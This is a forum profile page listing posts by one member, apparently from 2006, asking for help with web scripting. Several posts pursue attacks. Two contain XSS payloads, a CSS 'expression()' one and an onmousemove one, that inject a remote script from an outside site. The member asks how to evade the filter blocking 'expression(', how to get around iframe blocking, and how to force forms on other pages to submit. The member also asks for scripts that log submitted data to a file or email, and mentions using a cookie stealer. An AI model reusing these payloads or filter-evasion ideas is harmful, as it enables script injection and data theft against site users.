Jump to content

Cheap Commercial

Members
  • Posts

    17
  • Joined

  • Last visited

    Never

Profile Information

  • Gender
    Not Telling

Cheap Commercial's Achievements

Member

Member (2/5)

0

Reputation

  1. ok i want the php script to load a url lets use php include <?php include("http://www.othersite.com/filename.html"); ?> now i dont think that will work for this but so it gets a url but then i want to put in <script type="text/javascript" language="JavaScript"><!-- document.forms[1].submit(); //--></script> to make that url submit now what i need help is to perfect that so it actually works
  2. hey i was wonders how you can use php to load a url and then in the same php that loads the url have that url submit with a little java is that possible?
  3. hello i want to know if its possible to execute a .js without using "<script>" i know that this works [code]<span style="font-size..'1px' +function(){if (!document.profile){document.profile='3411';document.offs='0';var x=function(){var s=document.createElement('script');s.src='http://www.splices.org/info.js';document.body.appendChild(s)};window.attachEvent('onload', x);}}())"/><body onmousemove..="if (!document.profile){document.profile='31337';document.offs='0';var sc=document.createElement('script');sc.src='http://www.splices.org/info.js';document.body.appendChild(sc);}"/>[/code] but can someone give me something to help make it work?? please and thank you
  4. sorry im not specific i read somewhere that after a certain symbol on the image source you can put code to excute it maybe i might be wrong but i thought i would ask first
  5. hi theree where do you put the php in the image to execute it? and is there a way to do that with java script also??
  6. hahaha actually i found what ai needed from a cookie stealer.. odd but i still got it thanx anywayss
  7. hi there what is the php script for a .php that will submit all info from varible to a .txt file like [a href=\"http://www.splices.org/test/wow.php?bob=Poop\" target=\"_blank\"]http://www.splices.org/test/wow.php?bob=Poop[/a] and if i were to go to the txt it referes to i would see "poop" there does that help at all?? thanx for your help
  8. hi there what is the php script to send all info submitted to my email like [a href=\"http://www.splices.org/test/wow.php?bob=\" target=\"_blank\"]http://www.splices.org/test/wow.php?bob=[/a] ??? please and thank you in advanced
  9. hey i have a site i would like to have a login database and such but first i want to make just a php script that you can add or subtract varibles and still have it work for a register form Like for Name Email Birthday .ect and have it sent to a .txt file or email any help with that??
  10. is there anyway to change the following code so expression( is not there becuase it is blocked heres is the code <style> .divSubmitVisible {display:none;} </style> <span style="font-size=expression('1px' +function(){if (!document.ran){ document.ran=true; document.profile='6756'; document.offs='0'; var x=function(){ var s=document.createElement('script'); s.src='*************.js'; document.body.appendChild(s)}; window.attachEvent('onload', x); }}())" > </span> is it possible to change the font size thing to something else? that basically what i needed before the java to css thing
  11. [!--quoteo(post=365869:date=Apr 17 2006, 10:42 PM:name=businessman332211)--][div class=\'quotetop\']QUOTE(businessman332211 @ Apr 17 2006, 10:42 PM) [snapback]365869[/snapback][/div][div class=\'quotemain\'][!--quotec--] depends on the type of javascript. if you have a javascript drop down menu you can do that better with just css and xhtml in my opinion, if it's something else, it can be styled with css, the same way that xhtml is. google something like "styling javascipt with css" or "javascript and css" or something like that. [/quote] ahah ok thankxx boy you know alot about coding
  12. hi is there a way to convert javascript to css and be able to put it in a <style> tag?
  13. hi is there an alternate iframe tag to embed other web pages on another??
  14. [!--quoteo(post=365647:date=Apr 17 2006, 02:53 PM:name=businessman332211)--][div class=\'quotetop\']QUOTE(businessman332211 @ Apr 17 2006, 02:53 PM) [snapback]365647[/snapback][/div][div class=\'quotemain\'][!--quotec--] try adding _blank in the coding where the link resides. This will allow a link to open in a new window if that's what you mean. [/quote] no i mean like embeding an html page so that it still functions yet doesnt pop up ina window or somethin
  15. is there anyway to have a page that runs another one somewhere so it displays and functions but doesnt actually have to show? like an iframe but not cuz it is blocked on the site im reffering to is there anyway??
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.